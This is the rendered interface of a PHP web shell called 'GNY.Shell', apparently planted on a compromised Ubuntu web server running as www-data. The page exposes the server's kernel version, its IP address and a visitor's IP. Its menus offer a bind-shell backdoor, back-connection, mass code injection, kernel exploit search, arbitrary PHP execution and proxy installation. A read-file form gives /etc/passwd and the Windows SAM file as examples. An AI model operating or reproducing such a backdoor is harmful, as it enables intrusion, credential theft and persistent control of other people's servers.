_____ _   ___     __ _____ _          _ _ 
 / ____| \ | \ \   / // ____| |        | | |
| |  __|  \| |\ \_/ /| (___ | |__   ___| | |
| | |_ | . ` | \   /  \___ \| '_ \ / _ \ | |
| |__| | |\  |  | | _ ____) | | | |  __/ | |
                          \_____|_| \_|  |_|(_)_____/|_| |_|\___|_|_|  {V1.1 edited by $c0rPi0n}
Apache/2.4.52 (Ubuntu). PHP/5.6.40-62+ubuntu22.04.1+deb.sury.org+1
Kernel: Linux grlide 5.15.0-131-generic #141-Ubuntu SMP Fri Jan 10 21:18:28 UTC 2025 x86_64Safe-Mode: OFF (not secure)
uid=33(www-data) gid=33(www-data) groups=33(www-data) Disabled PHP Functions:
pcntl_alarm, pcntl_fork, pcntl_waitpid, pcntl_wait, pcntl_wifexited, pcntl_wifstopped, pcntl_wifsignaled, pcntl_wexitstatus, pcntl_wtermsig, pcntl_wstopsig, pcntl_signal, pcntl_signal_dispatch, pcntl_get_last_error, pcntl_strerror, pcntl_sigprocmask, pcntl_sigwaitinfo, pcntl_sigtimedwait, pcntl_exec, pcntl_getpriority, pcntl_setpriority,

cURL: ON
Free 6.58 GB of 57.97 GB (11.35%)Server IP: 147.182.186.89 - Your IP: 18.97.9.173

/usr/share/pastebin.d/   drwxr-xr-x
[Home]    [Back]    [Forward]    [Up]    [Refresh]    [Search]    [Buffer]    

[String/Hash Tools]    [Processes]    [Users]    [System Information]    [SQL Manager]    [Reverse IP]    [Kernel Exploit Search]    [Execute PHP Code]    [PHP Info]
    
[PHP Tools]    [Bind Shell Backdoor]    [Back-Connection]    [Mass Code Injection]    [Exploits]    [cPanel Finder]    [RFI/LFI Finder]    [Install IP:Port Proxy]    [Install PHP Proxy]    [Suicide Script]
    
Viewing file:   paste2.org.conf (156 B)      -rw-r--r--
Select action/file-type:
[info] (+) | [rename] (+) | [html] (+) | [txt] (+) | [code] (+) | [session] (+) | [exe] (+) | [sdb] (+) | [img] (+) | [ini] (+) | [download] (+) | [notepad] (+) | [edit] (+) |
[pastebin]
basename = paste2.org
regexp = http://paste2.org

[format]
title = description
content = code
format = lang
parent = parent

[defaults]
parent =

Enter:
 
Kernel Info:

Functions
Make Dir
Go Dir


 


[ Read-Only ]


 
Aliases
Make File
Go File


 


[ Read-Only ]


 

PHP Safe-Mode Bypass (Read File)

File:

e.g.: /etc/passwd or C:\WINDOWS\system32\.SAM
PHP Safe-Mode Bypass (Directory Listing)

Dir:

e.g.: /etc/ or C:\

Search
  - regexp 

Upload
 
[ Read-Only ]

.:[ GNY.Shell Encoded v1.1 ! Stand@rd Edition | Generated in: 0.0126 ]:.